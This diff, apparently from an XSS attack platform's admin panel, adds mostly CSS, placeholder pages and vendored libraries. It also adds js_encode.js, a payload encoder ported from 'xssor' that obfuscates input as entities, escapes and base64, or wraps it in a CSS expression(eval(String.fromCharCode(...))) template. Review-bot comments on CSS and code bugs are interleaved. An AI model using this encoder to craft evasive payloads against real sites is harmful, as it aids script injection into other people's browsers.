-o-transition: 0.5s ease;
-ms-transition: 0.5s ease;
transition: 0.5s ease;
}
#mainlogin {
float: left;
width: 250px;
height: 170px;
padding: 10px 15px;
position: relative;
background: #555555;
border-radius: 3px;
-moz-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
-webkit-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.5);
float: left;
width: 250px;
height: 170px;
padding: 10px 15px;
position: relative;
background: #555555;
border-radius: 3px;
-moz-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
-webkit-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.5);
}
#logo {
background: url(../images/logo.png);
height: 180px;
width: 300px;
margin-left: 17px;
margin-bottom: 10px;
background-repeat: no-repeat;
}
background: url(../images/logo.png);
height: 180px;
width: 300px;
margin-left: 17px;
margin-bottom: 10px;
background-repeat: no-repeat;
}

479
static/css/main.css Normal file

@@ -0,0 +1,479 @@
html, body, div, span, iframe,
h1, h2, h3, h4, h5, h6, p, a, img, dl, dt, dd, ol, ul, li,
table, tfoot, thead, tr, th, td,
article, aside, canvas, details, footer, header, section {
margin: 0;
padding: 0;
border: 0;
font-size: 100%;
font: inherit;
}
/* HTML5 display-role reset for older browsers */
body {
line-height: 1;
font-size: 12px;
}
ol, ul {
list-style: none;
}
html, body {
height: 100%;
font-family: 'Microsoft YaHei','Open Sans',arial,sans-serif;
}
html,
body,
.container-fluid,
.row,
.column {
height: 100%;
}
/* font */
@font-face {
font-family: 'icomoon';
src:url('../fonts/icomoon.eot?c8m22a');
src:url('../fonts/icomoon.eot?#iefixc8m22a') format('embedded-opentype'),
url('../fonts/icomoon.woff?c8m22a') format('woff'),
url('../fonts/icomoon.ttf?c8m22a') format('truetype'),
url('../fonts/icomoon.svg?c8m22a#icomoon') format('svg');
font-weight: normal;
font-style: normal;
}
[class^="icon-"], [class*=" icon-"] {
font-family: 'icomoon';
speak: none;
font-style: normal;
font-weight: normal;
font-variant: normal;
text-transform: none;
line-height: 1;
/* Better Font Rendering =========== */
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
.icon-logout:before {
content: "\e900";
}
.icon-info:before {
content: "\e904";
}
.icon-template:before {
content: "\e901";
}
.icon-my-js:before {
content: "\e903";
}
.icon-panel:before {
content: "\e902";
}
.icon {
margin-right: 0.917em;
}
/* Bootstrap overrides*/
.row,
.container-fluid {
padding: 0;
margin: 0;
}
.column {
padding-left: 0;
padding-right: 0;
}
/* Nav section */
#nav-section {
background-color: #35373d;
width: 220px;
float: left;
height: 100%;
}
#nav-section li {
border-bottom: 1px solid #4a4b51;
white-space: nowrap;
font-size: 11px;
line-height: 11px;
}
#nav-section li a {
color: #b8bbc2;
text-transform: uppercase;
text-decoration: none;
margin-left: 2em;
font-size: 14px;
padding: 2em 1.2em;
}
#nav-section li:hover {
background-color: #212329;
}
#nav-section li.active {
background-color: #0d1016;
}
.nav > li > a:hover,
.nav > li > a:focus {
background: none;
}
#dash-logo {
color: #fff;
background-color: #1996e4;
text-align: center;
}
#sidebar-nav {
padding: 0;
}
#rights {
width: 100%;
color: #848690;
font-size: 12px;
position: absolute;
bottom: 10px;
text-align: center;
line-height: 120%;
}
/* Toggle button */
#toggle-button {
margin-top: 27px;
border: none;
}
#toggle-button:hover,
#toggle-button:focus {
background-color: transparent;
}
#toggle-button .icon-bar {
background-color: #fff;
}
/* Main section */
.main-section {
float: none;
width: auto;
overflow: hidden;
height: 100%;
background-color: #eee;
}
#dash-logo,
.main-section-header > h2 {
font-size: 18px;
text-transform: uppercase;
line-height: 26px;
padding-top: 30px;
padding-bottom: 30px;
}
.main-section-header > h2 {
padding-left: 1.667em;
white-space: nowrap;
}
.main-section-header {
height: auto;
border-bottom: 1px solid #ededee;
-moz-box-shadow: 1px 0 4px #ededee;
-webkit-box-shadow: 1px 0 4px #ededee;
box-shadow: 1px 0 4px #ededee;
background-color: #fff;
}
/* 一些常用的style类 */
.overflow-hidden {
overflow: hidden;
}
.display-none {
display: none;
}
.clear {
clear: both;
}
/* 提示窗体样式 */
.windows {
-moz-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
-webkit-box-shadow: 0px 0px 10px rgba(0,0,0,0.5);
box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.5);
}
.windows-tip-div {
margin: 3px;
}
.windows-button-div {
float: right;
margin-top: 15px;
}
.windows-button {
margin-right: 10px;
}
#search_input_field {
width: 200px;
height: 23px;
}
.dropdownlist {
margin-top: 5px;
}
.search_div {
margin-top: 7px;
clear: both;
}
.search_input_field {
margin-top: 5px;
}
#findButton {
margin-top: 15px;
margin-left: 50px;
float: left;
}
#clearButton {
margin-left: 5px;
margin-top: 15px;
float: left;
}
/* js列表 */
.listbox {
border: none;
}
.listbox_toolbar {
position: relative;
height: 40px;
}
#myJS_add_button,
#myJS_del_button,
#myJS_clear_button,
#jsTemplate_add_button,
#jsTemplate_del_button,
#jsTemplate_clear_button {
float: left;
margin-left: 5px;
}
.listbox_toolbar_button_icon {
position: relative;
margin-top: 2px;
}
.listbox_toolbar_button_span {
margin-left: 4px;
position: relative;
top: 3px;
}
.listbox_item_table {
min-width: 130px;
}
.listbox_item_img {
width: 40px;
}
.listbox_item_name {
padding: 0px 5px;
font-weight: bold;
font-size: 14px;
}
.listbox_item_description {
padding: 0px 5px;
}
/* js编辑面板 */
.js_content_panel {
margin: 20px;
}
.js_content_div {
margin: 5px;
}
.js_content_button_div {
text-align: center;
margin: 5px auto;
}
/* 编辑器样式 */
.editor {
border: 1px solid #d4d4d4;
margin: 10px 5px;
}
#myJS_content, #jsTemplate_content {
width: "98%";
}
/* xssor */
#Ww_B_0 {
margin: 10px;
}
#Ww_B_0_Left {
width: 310px;
height: 233px;
float: left;
}
#Ww_B_0_textarea {
width: 300px;
height: 230px;
}
#Ww_B_0_Right {
width: 245px;
height: 230px;
float: left;
overflow: hidden;
padding-left: 5px;
}
/* about us */
#about_detail {
height: 0px;
padding-bottom: 100%;
}
#about_us_banner {
background-attachment: fixed;
background-color: #272833;
background-image: url("../images/banner.png");
background-position: center center;
background-size: cover;
box-shadow: 0 0.25em 0.5em 0 rgba(0, 0, 0, 0.25);
min-height: 100vh;
position: relative;
text-align: center;
z-index: 21;
}
#firesun {
margin-top: 4em;
}
#about_us_banner .content {
overflow: auto;
display: inline-block;
margin-right: 1%;
max-width: 95%;
padding: 2em;
position: relative;
text-align: right;
vertical-align: middle;
z-index: 1;
}
#about_us_banner .content header {
display: inline-block;
vertical-align: middle;
margin: 0;
padding: 0;
border: 0;
font-size: 100%;
font: inherit;
}
#about_us_banner .content header h2 {
font-size: 2.5em;
margin: 0;
color: #ffffff;
font-weight: 300;
line-height: 1.5em;
letter-spacing: -0.025em;
}
#about_us_banner .content header p {
margin: 0.5em 0 0 0;
top: 0;
font-size: 1.25em;
line-height: 1.75em;
color: #ffffff;
position: relative;
}
#about_us_banner .content .image {
border-radius: 100%;
display: inline-block;
height: 18em;
margin-left: 3em;
vertical-align: middle;
width: 18em;
}
#about_us_banner a:link,
a:visited {
color:#FFFFFF;
text-decoration:underline;
}
#about_us_banner a:hover,
a:active {
color:#FFFFFF;
text-decoration:none;
}
#about_us_banner .content .image .img {
border-radius: 100%;
display: block;
width: 100%;
}
#about_us_banner .content .image {
border-radius: 100%;
display: inline-block;
height: 18em;
margin-left: 3em;
vertical-align: middle;
width: 18em;
}
#about_us_banner .content .logoimage .logoimg {
display: block;
width: 100%;
}
#about_us_banner .content .logoimage {
border-radius: 100%;
display: inline-block;
height: 18em;
margin-left: 3em;
vertical-align: middle;
width: 18em;
}
#about_us_banner .content .image .img {
border-radius: 100%;
display: block;
width: 100%;
}
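Review bot: `width: "98%";` in the `#myJS_content, #jsTemplate_content` rule is a quoted string, which is not a valid length, so browsers drop the declaration; it should read `width: 98%;`. In the about-us block, `#about_us_banner a:link, a:visited` and `#about_us_banner a:hover, a:active` scope only the first selector of each list, so `a:visited` and `a:active` restyle links on the whole page; write `#about_us_banner a:visited` and `#about_us_banner a:active`. The `#about_us_banner .content .image` and `#about_us_banner .content .image .img` rules also appear twice with identical bodies, and one copy of each can go.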


@@ -1,176 +1,195 @@
#notifications-bottom-right {
position: absolute;
width: 360px;
right: 20px;
bottom: 40px;
position: absolute;
width: 360px;
right: 20px;
bottom: 40px;
}
.webpushtipoutter {
z-index:9999;
position:absolute;
right:5px;
bottom:5px;
_width:330px;
z-index: 9999;
position: absolute;
right: 5px;
bottom: 5px;
_width: 330px;
}
.webpushtipinner {
position:relative;
height:66px;
padding:7px;
position: relative;
height: 66px;
padding: 7px;
}
.newmailNotifyBox {
position:absolute;
bottom:0;
right:0;
z-index:5;
padding:8px 17px 7px 0;
overflow:hidden;
position: absolute;
bottom: 0;
right: 0;
z-index: 5;
padding: 8px 17px 7px 0;
overflow: hidden;
}
.newmailNotifyItem {
position:relative;
width:305px;
height:69px;
margin-bottom:10px;
padding:1px;
border-radius:5px;
-webkit-border-radius:5px;
box-shadow:0 2px 5px rgba(0,0,0,0.2);
-webkit-box-shadow:0 2px 5px rgba(0,0,0,0.2);
background:#ADBFC8;
background:-moz-linear-gradient(top,#C4D1D7,#98AFBA);
background:-webkit-gradient(linear,0 0,0 bottom,from(#C4D1D7),to(#98AFBA));
background:-o-linear-gradient(top,#C4D1D7,#98AFBA);
-moz-transition:box-shadow 1s;
position: relative;
width: 305px;
height: 69px;
margin-bottom: 10px;
padding: 1px;
border-radius: 5px;
-webkit-border-radius: 5px;
box-shadow: 0 2px 5px rgba(0,0,0,0.2);
-webkit-box-shadow: 0 2px 5px rgba(0,0,0,0.2);
background: #ADBFC8;
background: -moz-linear-gradient(top,#C4D1D7,#98AFBA);
background: -webkit-gradient(linear,0 0,0 bottom,from(#C4D1D7),to(#98AFBA));
background: -o-linear-gradient(top,#C4D1D7,#98AFBA);
-moz-transition: box-shadow 1s;
}
.newmailNotifyItem:hover .newmailNotify {
box-shadow:0 0 5px #8EC7EF inset;
-webkit-box-shadow:0 0 5px #8EC7EF inset;
box-shadow: 0 0 5px #8EC7EF inset;
-webkit-box-shadow: 0 0 5px #8EC7EF inset;
}
.newmailNotifyItem:hover .notify_type {
background:transparent;
*background:#EEF6F9;
background: transparent;
*background: #EEF6F9;
}
.newmailNotify {
height:66px;
background:#F7FDFF;
cursor:pointer;
border-radius:5px;
-webkit-border-radius:5px;
box-shadow:0 0 9px #E5EFF5 inset;
-webkit-box-shadow:0 0 9px #E5EFF5 inset;
height: 66px;
background: #F7FDFF;
cursor: pointer;
border-radius: 5px;
-webkit-border-radius: 5px;
box-shadow: 0 0 9px #E5EFF5 inset;
-webkit-box-shadow: 0 0 9px #E5EFF5 inset;
}
.newmailNotify .notify_close {
position:absolute;
top:-6px;
top:4px\9;
right:-6px;
right:4px\9;
width:15px;
height:15px;
height:14px\9;
overflow:hidden;
background:url(../images/mail.png) no-repeat -106px -18px #B6CFDA;
opacity:0;
filter:alpha(opacity=0);
border-radius:10px;
-webkit-border-radius:10px;
-moz-transition:opacity 0.2s ease;
-webkit-transition:opacity 0.1s ease;
_filter:alpha(opacity=100);
position: absolute;
top: -6px;
top: 4px\9;
right: -6px;
right: 4px\9;
width: 15px;
height: 15px;
height: 14px\9;
overflow: hidden;
background: url(../images/mail.png) no-repeat -106px -18px #B6CFDA;
opacity: 0;
filter: alpha(opacity=0);
border-radius: 10px;
-webkit-border-radius: 10px;
-moz-transition: opacity 0.2s ease;
-webkit-transition: opacity 0.1s ease;
_filter: alpha(opacity=100);
}
.newmailNotify:hover .notify_close:hover,.hover .notify_close:hover {
opacity:1;
filter:alpha(opacity=100);
opacity: 1;
filter: alpha(opacity=100);
}
.newmailNotify:hover .notify_close:active,.hover .notify_close:active {
opacity:1;
filter:alpha(opacity=100);
opacity: 1;
filter: alpha(opacity=100);
}
.newmailNotify:hover .notify_close,.hover .notify_close {
opacity:0.8;
filter:alpha(opacity=80);
opacity: 0.8;
filter: alpha(opacity=80);
}
.newmailNotify .notify_type {
position:relative;
float:left;
width:60px;
height:66px;
border-right:1px solid #CBDAE1;
background:#EEF6F9;
border-radius:5px 0 0 5px;
-webkit-border-radius:5px 0 0 5px;
position: relative;
float: left;
width: 60px;
height: 66px;
border-right: 1px solid #CBDAE1;
background: #EEF6F9;
border-radius: 5px 0 0 5px;
-webkit-border-radius: 5px 0 0 5px;
}
.newmailNotify .notify_type span {
display:inline-block;
width:32px;
height:34px;
margin:16px 0 0 16px;
background:url(../images/notify_letter.png) no-repeat;
display: inline-block;
width: 32px;
height: 34px;
margin: 16px 0 0 16px;
background: url(../images/notify_letter.png) no-repeat;
}
.newmailNotify .notify_type label {
position:absolute;
top:12px;
right:10px;
+right:5px;
text-align:center;
overflow:visible;
position: absolute;
top: 12px;
right: 10px;
+right: 5px;
text-align: center;
overflow: visible;
}
.newmailNotify .notify_type em {
display:inline-block;
cursor:pinter;
min-width:13px;
margin-right:-50%;
+margin-right:0;
padding:0 2px;
+padding:0 2px 2px;
border:1px solid white;
line-height:15px;
color:white;
font-weight:bold;
font-style:normal;
background:#D40707;
border-radius:8px;
-webkit-border-radius:8px;
background:-moz-linear-gradient(top,#E80505,#C70909);
background:-webkit-gradient(linear,0 0,0 bottom,from(#E80505),to(#C70909));
background:-o-linear-gradient(top,#E80505,#C70909);
display: inline-block;
cursor: pinter;
min-width: 13px;
margin-right: -50%;
+margin-right: 0;
padding: 0 2px;
+padding: 0 2px 2px;
border: 1px solid white;
line-height: 15px;
color: white;
font-weight: bold;
font-style: normal;
background: #D40707;
border-radius: 8px;
-webkit-border-radius: 8px;
background: -moz-linear-gradient(top,#E80505,#C70909);
background: -webkit-gradient(linear,0 0,0 bottom,from(#E80505),to(#C70909));
background: -o-linear-gradient(top,#E80505,#C70909);
}
@media screen and (-webkit-min-device-pixel-ratio:0) {
.newmailNotify .notify_type em {
border:none;
.newmailNotify .notify_type em {
border: none;
};
}
}.newmailNotify .notify_content {
margin-left:66px;
overflow:hidden;
width:230px;
.newmailNotify .notify_content {
margin-left: 66px;
overflow: hidden;
width: 230px;
}
.newmailNotify p {
margin:0;
padding:2px 0 1px;
white-space:normal;
white-space:nowrap\9;
_white-space:normal;
height:auto\9;
_height:16px;
_line-height:16px;
overflow:hidden;
text-overflow:ellipsis;
margin: 0;
padding: 2px 0 1px;
white-space: normal;
white-space: nowrap\9;
_white-space: normal;
height: auto\9;
_height: 16px;
_line-height: 16px;
overflow: hidden;
text-overflow: ellipsis;
}
@media screen and (-webkit-min-device-pixel-ratio:0) {
.newmailNotify p {
margin-top: 2px;
white-space:nowrap;
overflow:hidden;
text-overflow:ellipsis;
.newmailNotify p {
margin-top: 2px;
white-space: nowrap;
overflow: hidden;
text-overflow: ellipsis;
};
}
}.newmailNotify .notify_location {
padding:7px 0 1px;
font-size:12px;
font-weight:bold;
.newmailNotify .notify_location {
padding: 7px 0 1px;
font-size: 12px;
font-weight: bold;
}
.newmailNotify .notify_digest {
color:#8596A9;
padding-top:2px
color: #8596A9;
padding-top: 2px;
}

1
static/fonts/index.html Normal file

@@ -0,0 +1 @@
Boom has been planted!

BIN
static/images/avatar.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 285 KiB

BIN
static/images/banner.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.1 MiB

BIN
static/images/bluelotus.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 62 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 202 B

1
static/images/index.html Normal file

@@ -0,0 +1 @@
Boom has been planted!

BIN
static/images/js_icon.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.6 KiB

1
static/index.html Normal file

@@ -0,0 +1 @@
Boom has been planted!

10
static/js/ZeroClipboard.min.js vendored Normal file

File diff suppressed because one or more lines are too long

BIN
static/js/ZeroClipboard.swf Normal file

Binary file not shown.

11
static/js/ace.js Normal file

File diff suppressed because one or more lines are too long

2123
static/js/beautify.js Normal file

File diff suppressed because it is too large Load Diff

1
static/js/index.html Normal file

@@ -0,0 +1 @@
Boom has been planted!

7
static/js/jqxcombobox.js Normal file

File diff suppressed because one or more lines are too long

7
static/js/jqxinput.js Normal file

File diff suppressed because one or more lines are too long

7
static/js/jqxsplitter.js Normal file

File diff suppressed because one or more lines are too long

7
static/js/jqxtextarea.js Normal file

File diff suppressed because one or more lines are too long

7
static/js/jqxtoolbar.js Normal file

File diff suppressed because one or more lines are too long

326
static/js/js_encode.js Normal file

@@ -0,0 +1,326 @@
//代码地址https://github.com/evilcos/xssor
//本人仅作一些小改动移植到xss平台上
//code by yuxi4n
$("#rwb_b2").click(function() {
knownxss.encode.en(16);
});
$("#rwb_b2_j").click(function() {
knownxss.encode.de(16);
});
$("#rwb_b1").click(function() {
knownxss.encode.en(10);
});
$("#rwb_b1_j").click(function() {
knownxss.encode.de(10);
});
$("#rwb_b3").click(function() {
knownxss.encode._escape();
});
$("#rwb_b3j").click(function() {
knownxss.encode._unescape();
});
$("#rwb_b4").click(function() {
knownxss.encode._encodeURI();
});
$("#rwb_b4j").click(function() {
knownxss.encode._decodeURI();
});
$("#rwb_b5").click(function() {
knownxss.encode.html2js(1);
});
$("#rwb_b5j").click(function() {
knownxss.encode.html2js(2);
});
$("#rwb_b6").click(function() {
knownxss.encode.htmlencode(1);
});
$("#rwb_b6j").click(function() {
knownxss.encode.htmlencode(2);
});
$("#rwb_b7").click(function() {
knownxss.encode.base64Code(1);
});
$("#rwb_b7j").click(function() {
knownxss.encode.base64Code(2);
});
$("#rwb_b8").click(function() {
knownxss.encode.replaceC();
});
function _g(x) {
return document.getElementById(x);
}
var knownxss = {
Author: 'yuxi4n',
time: '2008-12-01'
};
knownxss.encode = {};
knownxss.encode._escape = function() {
_g('Ww_B_0_textarea').value = escape(_g('Ww_B_0_textarea').value);
};
knownxss.encode._unescape = function() {
_g('Ww_B_0_textarea').value = unescape(_g('Ww_B_0_textarea').value);
};
knownxss.encode._encodeURI = function() {
_g('Ww_B_0_textarea').value = encodeURI(_g('Ww_B_0_textarea').value);
};
knownxss.encode._decodeURI = function() {
_g('Ww_B_0_textarea').value = decodeURI(_g('Ww_B_0_textarea').value);
};
knownxss.encode.en = function(x) {
var _a = new Array();
var txt = _g('Ww_B_0_textarea').value;
if (x == 10) {
for (var i = 0; i < txt.length; i++) {
var _a;
var s = txt.charCodeAt(i).toString(16);
if (_g('rwb_b1_c2').checked) _a += "&#" + new Array(7 - String(s).length).join("0") + txt.charCodeAt(i);
else if (_g('rwb_b1_c3').checked) _a += "&#" + txt.charCodeAt(i) + ";";
else if (_g('rwb_b1_c4').checked) {
if (i < txt.length - 1) _a += txt.charCodeAt(i) + ",";
else {
_a += txt.charCodeAt(i) + ",";
_a = "cos:expression(eval(String.fromCharCode(105,102,40,33,119,105,110,100,111,119,46,120,41,123," + _a + "59,119,105,110,100,111,119,46,120,61,49,59,125)))";
}
} else _a += txt.charCodeAt(i) + ",";
}
if (_a.substr(-1, 1) == ',') _a = _a.substr(0, _a.length - 1);
_g('Ww_B_0_textarea').value = _a;
}
if (x == 16) {
for (i = 0; i < txt.length; i++) {
s = txt.charCodeAt(i).toString(16);
if (_g('rwb_b2_c2').checked) _a += "&#x" + new Array(5 - String(s).length).join("0") + s + ";";
else _a += "\\u" + new Array(5 - String(s).length).join("0") + s;
}
_g('Ww_B_0_textarea').value = _a;
}
};
knownxss.encode.de = function(x) {
var _a = new Array();
var txt = _g('Ww_B_0_textarea').value;
if (x == 10) {
if (_g('rwb_b1_c2').checked) {
var s = txt.split("&");
for (i = 1; i < s.length; i++) {
s[i] = s[i].replace('#', '');
_a += String.fromCharCode(s[i]);
}
} else if (_g('rwb_b1_c3').checked) {
s = txt.split(";");
for (i = 0; i < s.length - 1; i++) {
s[i] = s[i].replace('&#', '');
_a += String.fromCharCode(s[i]);
}
} else if (_g('rwb_b1_c4').checked) {
txt = txt.substring(txt.indexOf("105,102,40,33,119,105,110,100,111,119,46,120,41,123,") + 52, txt.indexOf("59,119,105,110,100,111,119,46,120,61,49,59,125"));
s = txt.split(",");
for (i = 0; i < s.length; i++)
_a += String.fromCharCode(s[i]);
} else {
s = txt.split(",");
for (i = 0; i < s.length; i++)
_a += String.fromCharCode(s[i]);
}
_g('Ww_B_0_textarea').value = _a;
}
if (x == 16) {
if (_g('rwb_b2_c2').checked) {
var _a = new Array();
s = txt.split(";");
for (i = 0; i < s.length - 1; i++) {
s[i] = s[i].replace('&#x', '');
_a += String.fromCharCode(parseInt(s[i], 16));
}
} else {
var _a = new Array();
s = txt.split("\\");
for (var i = 1; i < s.length; i++) {
s[i] = s[i].replace('u', '');
_a += String.fromCharCode(parseInt(s[i], 16));
}
}
_g('Ww_B_0_textarea').value = _a;
}
};
knownxss.encode.copy_ok = function() {
_g('Ww_B_0_textarea').style.background = '#DDDDDD';
setTimeout("_g('Ww_B_0_textarea').style.background='#FFFFFF'", 700);
};
knownxss.encode.html2js = function(i) {
var txt = _g('Ww_B_0_textarea').value;
if (i == 1)
_g('Ww_B_0_textarea').value = "document.writeln(\"" + txt.replace(/\\/g, "\\\\").replace(/\//g, "\\/").replace(/\'/g, "\\\'").replace(/\"/g, "\\\"").split('\r\n').join("\");\ndocument.writeln(\"") + "\");";
if (i == 2)
_g('Ww_B_0_textarea').value = txt.replace(/document.writeln\("/g, "").replace(/"\);/g, "").replace(/\\\"/g, "\"").replace(/\\\'/g, "\'").replace(/\\\//g, "\/").replace(/\\\\/g, "\\");
};
knownxss.encode.htmlencode = function(i) {
var txt = _g('Ww_B_0_textarea').value;
if (i == 1)
_g('Ww_B_0_textarea').value = txt.replace(/&/g, '&amp;').replace(/\"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
if (i == 2)
_g('Ww_B_0_textarea').value = txt.replace(/&amp;/g, '&').replace(/&quot;/g, '\"').replace(/&lt;/g, '<').replace(/&gt;/g, '>');
};
var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var base64DecodeChars = new Array(-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57,
58, 59, 60, 61, -1, -1, -1, -1, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6,
7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24,
25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36,
37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1);
knownxss.encode.base64encode = function(str) {
var out, i, len;
var c1, c2, c3;
len = str.length;
i = 0;
out = "";
while (i < len) {
c1 = str.charCodeAt(i++) & 0xff;
if (i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt((c1 & 0x3) << 4);
out += "==";
break;
}
c2 = str.charCodeAt(i++);
if (i == len) {
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt((c2 & 0xF) << 2);
out += "=";
break;
}
c3 = str.charCodeAt(i++);
out += base64EncodeChars.charAt(c1 >> 2);
out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
out += base64EncodeChars.charAt(c3 & 0x3F);
}
return out;
};
knownxss.encode.base64decode = function(str) {
var c1, c2, c3, c4;
var i, len, out;
len = str.length;
i = 0;
out = "";
while (i < len) {
do {
c1 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
} while (i < len && c1 == -1);
if (c1 == -1)
break;
do {
c2 = base64DecodeChars[str.charCodeAt(i++) & 0xff];
} while (i < len && c2 == -1);
if (c2 == -1)
break;
out += String.fromCharCode((c1 << 2) | ((c2 & 0x30) >> 4));
do {
c3 = str.charCodeAt(i++) & 0xff;
if (c3 == 61)
return out;
c3 = base64DecodeChars[c3];
} while (i < len && c3 == -1);
if (c3 == -1)
break;
out += String.fromCharCode(((c2 & 0XF) << 4) | ((c3 & 0x3C) >> 2));
do {
c4 = str.charCodeAt(i++) & 0xff;
if (c4 == 61)
return out;
c4 = base64DecodeChars[c4];
} while (i < len && c4 == -1);
if (c4 == -1)
break;
out += String.fromCharCode(((c3 & 0x03) << 6) | c4);
}
return out;
};
knownxss.encode.utf16to8 = function(str) {
var out, i, len, c;
out = "";
len = str.length;
for (i = 0; i < len; i++) {
c = str.charCodeAt(i);
if ((c >= 0x0001) && (c <= 0x007F)) {
out += str.charAt(i);
} else if (c > 0x07FF) {
out += String.fromCharCode(0xE0 | ((c >> 12) & 0x0F));
out += String.fromCharCode(0x80 | ((c >> 6) & 0x3F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
} else {
out += String.fromCharCode(0xC0 | ((c >> 6) & 0x1F));
out += String.fromCharCode(0x80 | ((c >> 0) & 0x3F));
}
}
return out;
};
knownxss.encode.utf8to16 = function(str) {
var out, i, len, c;
var char2, char3;
out = "";
len = str.length;
i = 0;
while (i < len) {
c = str.charCodeAt(i++);
switch (c >> 4) {
case 0:
case 1:
case 2:
case 3:
case 4:
case 5:
case 6:
case 7:
out += str.charAt(i - 1);
break;
case 12:
case 13:
char2 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
break;
case 14:
char2 = str.charCodeAt(i++);
char3 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) | ((char3 & 0x3F) << 0));
break;
}
}
return out;
};
knownxss.encode.base64Code = function(i) {
var txt = _g('Ww_B_0_textarea').value;
if (i == 1)
_g('Ww_B_0_textarea').value = knownxss.encode.base64encode(knownxss.encode.utf16to8(txt));
if (i == 2)
_g('Ww_B_0_textarea').value = knownxss.encode.utf8to16(knownxss.encode.base64decode(txt));
};
knownxss.encode.replaceC = function() {
var txt = _g('Ww_B_0_textarea').value;
var _t = new Array();
var oldV = _g('oldC').value;
var newV = _g('newC').value;
var s = txt.split(oldV);
if (s.length > 1) {
if (s[0] == '') {
for (var i = 1; i < s.length; i++)
_t += newV + s[i];
} else if (s[s.length - 1] == '') {
for (var i = 0; i < s.length - 1; i++)
_t += s[i] + newV;
} else {
for (var i = 0; i < s.length; i++)
if (i == s.length - 1) _t += s[i];
else
_t += s[i] + newV;
}
_g('Ww_B_0_textarea').value = _t;
}
};
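Review bot: `knownxss.encode.copy_ok` passes a string to `setTimeout`, which is compiled and executed like `eval` and will stop working as soon as the admin page is served with a Content-Security-Policy that omits `unsafe-eval`. The string is a constant, so this is hygiene rather than an injection path, but a callback does the same job: `setTimeout(function() { _g('Ww_B_0_textarea').style.background = '#FFFFFF'; }, 700);`. Separately, `base64decode` indexes `base64DecodeChars` with `charCodeAt(i++) & 0xff` although the table has only 128 entries, so input characters above 0x7F are either looked up as `undefined` (which passes the `== -1` checks) or aliased onto a valid base64 character, and malformed input decodes silently instead of being skipped. Treating any code above 127 as `-1` before the lookup would make the decoder's skip logic apply to those characters as well.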

299
static/js/jsmin.js Normal file

@@ -0,0 +1,299 @@
/* jsmin.js - 2006-08-31
Author: Franck Marcia
This work is an adaptation of jsminc.c published by Douglas Crockford.
Permission is hereby granted to use the Javascript version under the same
conditions as the jsmin.c on which it is based.
jsmin.c
2006-05-04
Copyright (c) 2002 Douglas Crockford (www.crockford.com)
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
The Software shall be used for Good, not Evil.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Update:
add level:
1: minimal, keep linefeeds if single
2: normal, the standard algorithm
3: agressive, remove any linefeed and doesn't take care of potential
missing semicolons (can be regressive)
store stats
jsmin.oldSize
jsmin.newSize
*/
String.prototype.has = function(c) {
return this.indexOf(c) > -1;
};
function jsmin(input, level) {
var a = '',
b = '',
EOF = -1,
LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz',
DIGITS = '0123456789',
ALNUM = LETTERS + DIGITS + '_$\\',
theLookahead = EOF;
/* isAlphanum -- return true if the character is a letter, digit, underscore,
dollar sign, or non-ASCII character.
*/
function isAlphanum(c) {
return c != EOF && (ALNUM.has(c) || c.charCodeAt(0) > 126);
}
/* get -- return the next character. Watch out for lookahead. If the
character is a control character, translate it to a space or
linefeed.
*/
function get() {
var c = theLookahead;
